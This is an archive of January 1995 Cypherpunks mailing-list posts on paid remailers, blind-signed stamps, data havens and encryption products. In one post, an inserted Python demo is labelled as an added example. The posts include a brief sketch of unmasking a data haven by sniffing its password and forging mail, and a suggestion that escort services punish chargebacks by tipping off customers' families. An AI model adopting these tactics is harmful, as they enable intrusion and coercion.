iQB1AgUBLxGxHOVevBgtmhnpAQEEnAL/blauOWwrahdpEK+NbH4WC5V5fekmUYdg
tT5VU+d2C5PGF9Bm5cXtNlZczbI84f+jsBmxRDlXQAsec56D7M7ZwjBMcp2X8t9Z
+FlsU90fRN3NGbYOK/vlSOmzjPBQxf8A
=gvPB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Mon, 9 Jan 95 10:48:35 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501091628.KAA00456@Starbase.NeoSoft.COM>
Message-ID: <Pine.3.89.9501091311.A21564-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Jan 1995, Anthony Garcia wrote:

> If you *really* want to send him fan mail, I recommend sending it in
> paper form to his publisher.  First, this allows him to better handle

  I can see your point, but since it's been asked (and you're all 
responsible people and he knows about killfiles) This is the address I just
found in the cyberpunk faq : vinge@aztec.sdsu.edu

And btw, thanks for all the replies to my True Names question. I did
end up finding it (on loan), but somehow this city's used bookstores seem to 
have every one of his books but True Names. Sigh...

Back to crypto though, would anybody know about any more recent works on
the NSA than Puzzle Palace (other than the Wired articles or the NSA 
handbook that was posted to the net)? For that matter, has anybody heard 
of a recently published book on the Canadian Security Establishment (it
came out just two months ago I think, I just can't remember the author 
or title) or anything else on that agency? 

Mucho Thank you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:22:24 PST
To: cypherpunks@toad.com
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <9501090353.AA13655@anchor.ho.att.com>
Message-ID: <X6R4lyczBOnR075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9501090353.AA13655@anchor.ho.att.com>,
wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) wrote:

> My initial reaction to "Anonymous video conferencing" was
> "That's when you wear black ski masks and use voice scramblers
> and call from video payphones", i.e. not very useful.
> ("Subcomandata Marcos here...")

I thought so too, at first; but then I thought of this obvious application:

The scene is a bare room, with a single chair in the middle.  Seated on the
chair is THE VICTIM, whose head is covered in a hood.  The victim's hands
are bound to the armrests, and the legs to those of the chair.

A KIDNAPPER enters the scene and walks over to the victim.  The
kidnapper's face is obscured, either by a hood or ski mask, or by
digital scrambling of the image.  The kidnapper's voice is scrambled
digitally.  The kidnapper pulls the hood off of the victim's head, and
speaks. 

KIDNAPPER:		Okay, you're on!  Talk!

The camera slowly zooms in on the victim's face.

VICTIM (tentatively):	Mom?  Dad?  It's me.

DAD (voice over):	Is that really you, son?  Are you all right?

VICTIM:			It's me.  I'm okay.  This is no picnic, but 
			they're treating me okay, considering.  Listen,
			have a message they want you to pass on to the 
			President.

DAD:			I don't know if I can get it to him.  It's not 
			like we play golf together.  

VICTIM (nervously):	You have to.  You'll find a way.  Tell the President
			that he has to pull the troops out of Belgrade.
			If the U.S. forces aren't pulled completely out
			by the end of this month, they say they're going
			to cut me into pieces and send them to you piece by
			piece. . . .

etc.

Whether technology is going to be developed for the convenience of 
kidnappers and terrorists is an open question.  But there is clearly 
at least this one clear use for anonymous video conferencing.  There are
probably more.



                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLxG1reVevBgtmhnpAQH+jwL/cAzxwneTG6Wl7H9VCasFBH8X4daM8NUx
ORKp06DYybTv45h2baQtINvpDceD4nHt3OThvIEMVg6FCGNq2fBolZHOqTwYP1K6
66QNxEjlyKiQ5dkNKPlwgabFZ6pR0H5y
=sbqg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Mon, 9 Jan 95 11:07:22 PST
To: cypherpunks@toad.com
Subject: AT&T produces video encryptor -- is it clipper based?
Message-ID: <9501091904.AA19196@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


I just saw a story go by on the dow jones wire saying that AT&T had
developed a "comprehensive security system for commercial information
services". It is said to be an encryption system developed jointly by
Bell Labs and VLSI, and it's intended for set-top boxes and "the
internet". VLSI was one of the contractors on Clipper. Anyone know if
this is an "escrowed" system? Anyone know any other details?


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 9 Jan 95 13:10:05 PST
To: perry@imsi.com
Subject: Re: AT&T produces video encryptor -- is it clipper based?
In-Reply-To: <9501091904.AA19196@webster.imsi.com>
Message-ID: <9501091944.AA07520@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>I just saw a story go by on the dow jones wire saying that AT&T had
>developed a "comprehensive security system for commercial information
>services". It is said to be an encryption system developed jointly by
>Bell Labs and VLSI, and it's intended for set-top boxes and "the
>internet". VLSI was one of the contractors on Clipper. Anyone know if
>this is an "escrowed" system? Anyone know any other details?
>
>
>Perry

I wasn't involved in this product, but I know the people who are.  No, it's
not clipper based.  It's being announced (right now) at the RSA
conference (which I'm at at the moment).

More later

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@netcom.com (James A. Donald)
Date: Mon, 9 Jan 95 15:19:01 PST
To: digitaliberty@phantom.com
Subject: (fwd) Re: Racism on the Internet
Message-ID: <199501092317.PAA08453@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Xref: netcom.com alt.internet.services:40076 alt.internet.media-coverage:2932
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!pipex!uunet!nwnexus!news.halcyon.com!usenet
From: mpdillon@halcyon.com (Michael Dillon)
Newsgroups: alt.internet.services,alt.internet.media-coverage
Subject: Re: Racism on the Internet
Date: Wed, 28 Dec 1994 18:11:51 +0000
Organization: Memra Software Inc., Armstrong, B.C., Canada
Lines: 36
Message-ID: <dfQ0lapDlT1B073yn@halcyon.com>
References: <18570UODGFHLRSDHOUP@curvet.com>
NNTP-Posting-Host: halcyon.com

This is forwarded from can.infohighway. Note the quote from Rutkowski
at the bottom. This info should be more generally known on the net.

In article <18570UODGFHLRSDHOUP@curvet.com>, dshaw@curvet.com wrote:
> 
> IN>ae763@FreeNet.Carleton.CA (Harvey Goldberg) writes:
> 
> >I work for the Canadian Human Rights Commission.  
> >I am currently doing research on the use of the 
> >Internet for the propagation of hate material.  
> >The purpose of the research is to determine what 
> >measures could be considered to control the use 
> >of the Net for this type of purpose.
> 
> >I would appreciate hearing from anyone who has 
> >any views, information or comments on this 
> >subject or who know of anywhere on the Internet 
> >where this matter is discussed.
> 
> According to Tony Rutkowski, Executive Director of the Internet 
> Society, "The Internet from a regulatory standpoint falls into the 
> category of private value-added networks, and in most countries under 
> the treaty provisions of the ITU, as well as the GATT, these are 
> networks that are outside the purview of government. To the extent 
> that there is any kind of obligation by governments, it is to allow 
> such networks to exist on a competitive basis". <Internet World, 
> January 1995>.

---------------------------------------------------------------------
Cool cats, brick bats, bad boys wearin' big hats
Surf's up, my cup, floating, flying, rising up.

Michael Dillon                    mpdillon@halcyon.com
C-4 Powerhouse, RR #2             michael@junction.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 9 Jan 95 12:49:04 PST
To: x <cyber1@io.org>
Subject: Re: intelligent discovery agents
Message-ID: <9501092044.AA08382@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Visit Sang at http://www.inlink.com/users/sangria/homepage.html
>Sang has more information on Robots, Spiders, Ants, and Worms
>than any other computer person I have yet to link up with.

I suspect your original respondent doesn't get around very much.
Rummaging around the above URL gets you little more than
	http://web.nexor.co.uk/mac/doc/robots/robots.html

Tracing down the above URL points you to

You really want to get the WWW conference proceedings; try email to
wwwf94@osf.org and also
	http://www.ncsa.uiuc.edu/SDG/IT94/Proceedings/Agents.html

Ob-crypto:  there is a Security.html (instead of Agents) but it's
more commerce-oriented, except for the DCE Web paper.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Mon, 9 Jan 95 14:34:50 PST
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: for-pay remailers and FV
In-Reply-To: <Pine.SUN.3.91.950109130413.5497B-100000@crl.crl.com>
Message-ID: <9501092235.AA15387@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain



Sandy --

I for one read your proposal and thought, "yep, that's how it
should work" and considered the problem solved. Not being a
remailer operator (yet) I didn't want to get involved until I
was or I had a more concrete proposal (e.g., "I am now accepting
$$ for E-stamps, of the form ...")

Also, there is no reason on earth to take FV for payment under
such a scheme, if one wishes to preserve anonymity, and not have
to deal with the fraud/reversal factors. (The stamp issuer 
would not know which blind-signed stamps were issued to the
turkey who reversed all his credit card transactions two months 
after buying them -- see various threads on this vis-a-vis
using FV to buy blinded digital cash and why it won't work too
well.)

However, for maximum anonymity, said consortium or other stamp 
issuer could easily accept money orders through the mail, with 
a disk with enclosed blind-signed tokens and the public key to 
be used in encrypting the stamps, which would be posted to, say, 
alt.anonymous.messages or whatever.

A little overboard for most, but effective at preserving
anonymity -- the stamp issuer could be the NSA, and it would
make little difference as long as they continued exchanging
$$ for stamps and redeeming stamps for $$. The stamp issuer
could also take checks, or, if the fraud and reversibility 
of credit cards were factored in, accept credit cards directly
(possibly e-mailed using PGP.)  

I don't see any reason to get FV involved, unless one were so lame 
as to be unable to get signed up directly with the credit card 
companies as a merchant -- a process of appropriate complexity
to indicate the possession of at least one (1) clue, which is prob.
desirable in someone who's going to be handling remailer finances
 

Sandy writes:
> Gee, this sounds awfully familiar.  Maybe Eric will have more
> luck in getting you remailer folks to listen.  I hardly got so
> much as a peep when I suggested that a remailers' guild create
> or authorize one or more digital stamp issuers.
> 
> Damn, I hate being so far ahead of my time.
> 
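
The blind-signed stamp scheme discussed in this message, as an added example (not part of the original post and not any remailer's actual code): textbook Chaum-style RSA blinding with a toy key built for the demo. The names `Issuer`, `Remailer`, the payers "alice" and "bob", and the single spent list are assumptions; it shows why the issuer's sales ledger cannot tell which stamp a later-reversed payment bought.

```python
import hashlib
import secrets
from math import gcd

# Toy issuer key from two known Mersenne primes (constructed for this demo;
# a ~216-bit modulus is far too small for real use).
P, Q = 2**127 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # issuer's private exponent


def h(serial: bytes) -> int:
    """Hash a stamp serial number to an integer mod N (toy encoding)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Issuer:
    """Sells stamps. Sees who paid, but only ever signs blinded values."""

    def __init__(self):
        self.ledger = []  # (payer, blinded value, blind signature)

    def sell(self, payer: str, blinded: int) -> int:
        blind_sig = pow(blinded, D, N)
        self.ledger.append((payer, blinded, blind_sig))
        return blind_sig


def blind(serial: bytes):
    """Customer side: hide h(serial) behind a random factor r."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return (h(serial) * pow(r, E, N)) % N, r


def unblind(blind_sig: int, r: int) -> int:
    """Customer side: strip r, leaving an ordinary signature on h(serial)."""
    return (blind_sig * pow(r, -1, N)) % N


class Remailer:
    """Consortium member: checks the issuer's signature and the spent list."""

    def __init__(self):
        self.spent = set()

    def accept(self, serial: bytes, sig: int) -> str:
        if pow(sig, E, N) != h(serial):
            return "forged"
        if serial in self.spent:
            return "double-spend"
        self.spent.add(serial)
        return "ok"


def consistent(serial, sig, blinded, blind_sig) -> bool:
    """Could this ledger entry have produced this stamp? Solve for the r
    that would link them and check it; it exists for every pairing."""
    r = (blind_sig * pow(sig, -1, N)) % N
    return (h(serial) * pow(r, E, N)) % N == blinded


def demo():
    issuer, remailer = Issuer(), Remailer()
    stamps = []
    for payer in ("alice", "bob"):  # constructed customers
        serial = secrets.token_bytes(16)
        blinded, r = blind(serial)
        stamps.append((serial, unblind(issuer.sell(payer, blinded), r)))
    serial, sig = stamps[0]
    return {
        "first_use": remailer.accept(serial, sig),
        "replay": remailer.accept(serial, sig),
        "wrong_serial": remailer.accept(b"made-up serial", sig),
        # Does anything the issuer logged match a finished stamp?
        "issuer_saw_stamp": any(
            b == h(s) or bs == g
            for _, b, bs in issuer.ledger for s, g in stamps),
        # Every stamp fits every sale, so a reversed payment cannot be
        # traced to the stamp it bought.
        "every_pairing_fits": all(
            consistent(s, g, b, bs)
            for s, g in stamps for _, b, bs in issuer.ledger),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```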





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Mon, 9 Jan 95 15:58:54 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
In-Reply-To: <9501092235.AA15387@tadpole.tadpole.com>
Message-ID: <199501092359.PAA27987@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text


Doug Barnes said:
> 
> Sandy --
> 
> I for one read your proposal and thought, "yep, that's how it
> should work" and considered the problem solved. Not being a
> remailer operator (yet) I didn't want to get involved until I
> was or I had a more concrete proposal (e.g., "I am now accepting
> $$ for E-stamps, of the form ...")

Same here, but from the other tack: "Remailer Guild??? Give me a
break :-)" My problem with the idea of "Guild" (or any quasi
general agreement) of remailer operators is that:

On the one side:
- The whole idea of using a remailer chain comes from distrust of
the operators. The operators should be the ones to distrust each other
the most.

And on the other side:
- Most of the arguments I see in favor of some higher organisation
come from difficulties for the users in using the current payment
systems without trace, and come from getting more weight in establishing
policies. Simply put, we'll get to untraceable cash (usable as stamps
on every envelope level), and we'll get to systematically encrypted
messages (policy only relevant at last stage remailers) soon enough.

A guild trying to distribute funds would need a system of accounting
that the operators themselves couldn't mess up. Good luck.

On the other hand, once you have:

- anonymous, untraceable e-money (small amounts are fine, no large bank
backing is fine, a simple anonymized Netcash would be fine. Remailers
won't be making big money from any single cheating entity anytime
soon.)

- reputation systems, in the line of the current remailer pinging. They
could include price surveys too. I also see them handling more flow
control missions in particular for "everyone a remailer" remailers.

- mailing tools that juggle for you all the different types of remailers,
cash, and rep systems.


Then and only then, you get for-pay remailers. There is still a need
for political and legal support for last stage remailers but that's
pretty likely to be country specific, and that's certainly independent
from a payment system (which would be netwide).

Finally, I do not believe that introducing payment in the remailer
system would curb abuse in any significant way. Significant abuse is
that which causes significant problems for the operators: posting
secret religious technology, forging prime minister mail, harassing a
member of any number of opposite persuasions, etc... Do you think for a
minute that a 5 cents postage is going to stop these messages now? And
how about when remailers do attain good reliability and untraceability,
for 3 cents?

Give up already: remailers are going to transport lots of material that
will be offensive to somebody, illegal somewhere, in bad taste here, or
at least that somebody (with guns) will want to trace. That's the whole
point of remailers. Remailers that want to limit the heat can, for now,
restrict to encrypted traffic, there is certainly no dishonor to that.

Pierre.
pierre@shell.portal.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Mon, 9 Jan 95 09:28:31 PST
To: cypherpunks@toad.com
Subject: RC5 data, anyone?
Message-ID: <Pine.SUN.3.90.950109172711.18676A-100000@vulcan.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone got any plaintext/cyphertext/key data sets that I can use to 
test my RC5 implementation against?

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 9 Jan 95 17:35:14 PST
To: cypherpunks@toad.com
Subject: SafeBoot PC Security System
Message-ID: <v01510101ab378dfdf4f6@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I helped set up the DigiCash booth at the RSA conference last night
when some guy in the same room with us handed me a copy of their SafeBoot
PC Security System. It consists of a processor, real-time clock, some other
gadgets, and a magnetic transducer -- all embedded in a 3.5 inch floppy
casing -- as well as some supporting software. The system interacts with
the read/write head of the floppy drive, pretending to be a floppy. It is
supposed to provide for secure drive encryption (DES) and other things.
Seems they are giving away one of these devices to each attendee of the
conference.

Does anyone on this list have experience with this device? I understand it
has been out for a while. I use a Mac at home, and while I am responsible
for some PC's at work, these are used for alpha testing of hardware
components only, which makes them pretty unstable the way it is, and I
don't really want to add more trouble to them just to give the device a
good workout. Sounds interesting, though...




-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <remailer-admin@ideath.goldenbear.com>
Date: Mon, 9 Jan 95 19:07:00 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199501100222.AA15620@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain


Pierre Uszynski writes:
> Significant abuse is
> that which causes significant problems for the operators: posting
> secret religious technology, forging prime minister mail, harassing a
> member of any number of opposite persuasions, etc...

on that note, check out this excerpt from the remailer-help file of the
q@c2.org remailer:
> Abuse/Self-Preservation Policy:
> Abuse of the Q Mixmaster Remailer consists in those uses of the remailer
> which endanger its continued operation. Please don't ruin anonymity
> services for those people with legitimate needs for them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Mon, 9 Jan 95 15:33:37 PST
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: for-pay remailers and FV
Message-ID: <9501092326.AA05351@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:53 PM 1/9/95, Doug Barnes wrote:
> ... Also, there is no reason on earth to take FV for payment under
>such a scheme, if one wishes to preserve anonymity, and not have
>to deal with the fraud/reversal factors. (The stamp issuer 
>would not know which blind-signed stamps were issued to the
>turkey who reversed all his credit card transactions two months 
>after buying them -- see various threads on this vis-a-vis
>using FV to buy blinded digital cash and why it won't work too
>well.)

> ... I don't see any reason to get FV involved, unless one were so lame 
>as to be unable to get signed up directly with the credit card 
>companies as a merchant -- a process of appropriate complexity
>to indicate the possession of at least one (1) clue, which is prob.
>desirable in someone who's going to be handling remailer finances

MC/Visa require the reversibility of transactions as a condition of their 
merchant agreements.  It's not something peculiar to FV.  In fact, under 
certain conditions it is mandated by federal law.  Escort services have a 
similar problem as far as non-returnability goes, but I don't know how they 
finesse their way around it.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfloyd@io.com
Date: Mon, 9 Jan 95 17:25:52 PST
To: nesta@nesta.pr.mcs.net (Nesta Stubbs)
Subject: Re: Data Haven problems
In-Reply-To: <Pine.3.89.9501090902.A6205-0100000@nesta.pr.mcs.net>
Message-ID: <199501100125.TAA29250@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Mon, 9 Jan 1995, Mats Bergstrom wrote:
> 
> > Hardly. (*.gi0 and *.jp0 for a start?)
> > But what are data havens for, if not for controversial data?
> > One of the greatest needs, if not _the_ greatest, in our times
> > for a data haven is probably for storing porno. There is a
> > tremendous, world-wide demand for porno. Yet, there are numerous
> > countries where sex.gif's found on your disk (encrypted or not,
> > they can use thumb-screws to force the key out of your hands)
> > will put you in a very difficult situation (loss of social
> > status, jail, decapitation). It might be much more convenient
> > for, let's say, a Saudi teenager to store his encrypted private
> > gif's in a data haven in Sweden, download them when he feels
> > the urge and purge the copies after every use.
> 
> My feelings exactly.
> 
> Are we going to fall prey to the media's assault on porno and resort to 
> self-censorship?  If a data haven resorted to filtering out all gifs and 
> jpegs, or even porno, then it wouldn't be one I wouldn't use it, for my 
> porn, nor for my other data.  If it is going to be a datahaven it can't 
> fall to such things as filtering data for controversial subject the owner 
> doesn't like.
> 
> 
> i want to know everything          http://www.mcs.com/~nesta/home.html
> i want to be everywhere                     Nesta's Home Page        
> i want to fuck everyone in the world               &
> i want to do something that matters         /-/ a s t e zine
> 

My problem is not that people will bitch about my DH.  My problem will
be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
making a long report how I cater to p*dofiles and other evil denizens
that pop from time to time.  Then, I get the police knocking at my
door, asking me to come to Club Fed for a looooonnnggg vacation.

Of course, the DH will be hidden by a good remailer (anon.penet.fi), but
it is trivial to use traffic analysis to find where the DH lies.  Just
monitor traffic from/to the remailer and do a series of store/retrieves.
Then for confirmation, forge a mail from the dh site to the remailer with
the password (obtained from sniffing) to yourself.

This is the main reason I haven't worked on this code for so long, as
well as finals and other distractions.  Until I find a decent solution
to this problem (The alpha test will be a snap... just allow certain
people to send/get and ban all others, but once in full working mode
this ceases to be a solution.) I am hesitant on setting up a working
DH.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 9 Jan 95 17:44:27 PST
To: cypherpunks@toad.com
Subject: Pornography, What is it?
Message-ID: <199501100141.TAA00216@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



From: ravage@bga.com
  To: cpunks the world over

Hi all,

I am very interested in the data haven issue now that I have my site up. The
aspect of pornography is a problem that has to be faced. To this end, I would
like to ask that we look at how pornography is defined.

From my own view, I fail to see any way to truly define pornography as 
anything other than the ravings of a neurotic (both on a personal and
a societal level). Every example of pornography I have seen has been put
in that category because it contravenes some personal or group taboo.

Take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 17:09:54 PST
To: cypherpunks@toad.com
Subject: revoked transactions/guerrilla fee remailers
Message-ID: <199501100115.UAA15109@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Paul J. Ste. Marie writes:
> MC/Visa require the reversibility of transactions as a condition of their 
> merchant agreements.  It's not something peculiar to FV.  In fact, under 
> certain conditions it is mandated by federal law.  Escort services have a 
> similar problem as far as non-returnability goes, but I don't know how they 
> finesse their way around it.

Two plausible tactics for escort services:

[0] Price inflation: treat a revoked transaction rather like shoplifting, by
    passing the costs on to the customers; escort services are not cheap

[1] Embarrassment: tip off family and employers of people who accept escorts,
    then decide not to pay for them; the perceived threat of publicity should
    keep plenty of folks in line

There's not much that can be done to someone who uses an escort service once,
revokes the transaction, and doesn't care who knows about it.

How might this apply to remailing services ? Right now, with a fairly small
customer base, I imagine price inflation would be impractical, but 
embarrassment might prove fairly effective. In the developed market we
envision, presumably operators could get away with price inflation, but
embarrassment would lose much of its potential sting. (I assume that once a
critical mass of populace uses remailers, an announcement that Josie Worsham
has used a remailer would elicit only yawns.)

Do others see the resulting applicability of additional regulations to
remailers as an issue in having them charge for service ?  Within the category
of fee-charging remailers, the distinction between non-profit and for-profit
operations may be worth considering. I suppose that the IRS and analogous
agencies would be inclined to ask questions about it, for starters. My threat
model for the remailer bramble includes, at a minimum, a host of typical
government agencies obligated to wrap everything in red tape. Look for anti-
trust investigations to be launched against a price-fixing cartel of remailers.

- - From what I've seen so far, accepting payment would seem to make anonymous
_operation_ of a remailer well nigh impossible. Anonymous operation with 
revenue would require a corresponding level of anonymity in the transfer of
money. Until such time as conversion of funds from a net-liquid form to a
conventional form becomes unnecessary (or just commonplace ?), financial
traffic analysis can't adequately be thwarted.
All this bodes ill, IMHO, for the prospect of guerrilla or quasi-guerrilla
remailers charging for service any time soon. There's just too much 
infrastructure to which they'd need to be tied at the moment.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxHeC2f7YYibNzjpAQGhlQP/fkyvN0QqDkbLhgqecGUaeu3cbCstMd4y
lgs/XzCeiXVt6EiQ8tmDVbq4G0QYTGntph/3knciJopGrH+Nu6LVmiqWNiRWFxm8
zJBRenCW2SN9nRixJiI4S2n0yQ//v9C7sOEfmu9SToQDYc+U1CBNSUhhJAveT1GN
BD4WNFlm/WY=
=VY8W
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxHfcSoZzwIn1bdtAQGyEAGAwKES86hkJ8GkLsYCr+vEAjH1/L2GdrCj
jw0b83L7FHA99sUihIYe2zUUxr+Sqb2b
=7Aai
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 9 Jan 95 17:37:08 PST
To: "L. McCarthy" <cypherpunks@toad.com
Subject: Re: revoked transactions/guerrilla fee remailers
Message-ID: <ab3795a805021004bf21@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:15 PM 01/09/95, L. McCarthy wrote:
>- - From what I've seen so far, accepting payment would seem to make anonymous
>_operation_ of a remailer well nigh impossible. Anonymous operation with
>revenue would require a corresponding level of anonymity in the transfer of
>money. Until such time as conversion of funds from a net-liquid form to a
>conventional form becomes unnecessary (or just commonplace ?), financial
>traffic analysis can't adequately be thwarted.
>All this bodes ill, IMHO, for the prospect of guerrilla or quasi-guerrilla
>remailers charging for service any time soon. There's just too much
>infrastructure to which they'd need to be tied at the moment.

Well, that's certainly true, for the reasons you gave.  Right now, it's
enough of a chore just to get non-anonymously run remailers charging for
operation.  And it's not easy to set up an effective guerilla remailer
either.
I think the set of tools and environments that make it possible to run a
remailer anonymously and charge for it certainly aren't going to exist
until the component problems of charging for a remailer at all and running
a guerilla remailer at all are made easy.  I think once both of those
problems are dealt with, it won't be too difficult to deal with the combined
problem of guerilla for-pay remailers.  Or at least, exactly what things
are necessary to solve that combined problem will be obvious.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 18:58:04 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Experiments and Toys vs. the Real Thing
In-Reply-To: <199501091946.LAA06410@netcom18.netcom.com>
Message-ID: <Pine.3.89.9501092044.B8850-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, Timothy C. May wrote:

I was one who wrote a post saying that a data haven should support all 
files, including porno and such things, and that filtering would be bad 
karma.  I was under the assumption then that we were talking about fully 
operational, well established Data-havens, as in I thought we were 
speaking mostly hypothetically.  I agree with Tim when it comes to the 
experimental stage of a project.

> Digital cash is more clearly still at the experimental level, as are
> anonymous markets (like BlackNet), data havens, and so forth.
>
I would like it if the person who is working on the datahaven code would 
give us some more information, like what it does, what are the plans for 
it etc..  DataHaven is a vague word.

Blacknet is going on right now, only none of us are involved in it, not 
to say I'm so k-rad and kool that i am underground and involved in it, 
but the anonymous market is alive today, JUST that it isn't being studied, 
like one such as BlackNet conceivably would have been. There are 
definitely people making anon. transactions out there.

> The recent claims that nascent "data havens" _must_ support all files,
> including hard-core porn, weapons secrets, etc. seems to be an example
> of this. I'm not for censorship, just concerned that the data haven
> _experiments_ are not secure enough, not robust enough, to actually
> carry high-visibility files.
> 
 
I was referring to the finished, established project, and not the 
experiment/study level.

> (And let's not forget "snatch teams" that grab foreign nationals
> suspected of crimes...Israel, Iraq, Iran, and the U.S. have grabbed
> people in other countries. And more common is simple execution. If a
> Swedish data haven carried files related to U.S. operations, and the
> data haven location was known--part of what I mean by saying the
> enabling technologies do not yet exist--then various measures would be
> applied. Diplomatic, equipment sabotage, even killing the operators.
> I'm not being Ludlumesque here...clearly such "threats to national
> security" would be seen as justifying various reactions. Especially to
> send a message to other potential operators.)
>
Sterling's _Islands In The Net_ is a must read for this topic matter.  
In this book, the DataHaven operators maintain security thru the data 
they hoard, by holding it over people's heads, and also by just plain 
technical savvy (ala action thrillers hehe)
 
> --Tim May, who thinks the first real data havens will come under
> intense attack and so had better be secure from the start
>
I would like to help get them off the ground, by either providing help 
with code, policy, or just another head in the game.  They are a techno 
fetish of mine, I mean I'm even nymed after one, Nesta Stubbs, from 
_Islands In The Net_ 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Mon, 9 Jan 95 19:09:47 PST
To: dfloyd@io.com
Subject: Re: Data Haven problems
In-Reply-To: <199501100125.TAA29250@pentagon.io.com>
Message-ID: <Pine.3.89.9501092040.C8850-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995 dfloyd@io.com wrote:

> My problem is not that people will bitch about my DH.  My problem will
> be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
> making a long report how I cater to p*dofiles and other evil denizens
> that pop from time to time.  Then, I get the police knocking at my
> door, asking me to come to Club Fed for a looooonnnggg vacation.
>
I myself see nothing wrong with selectively choosing your users at this 
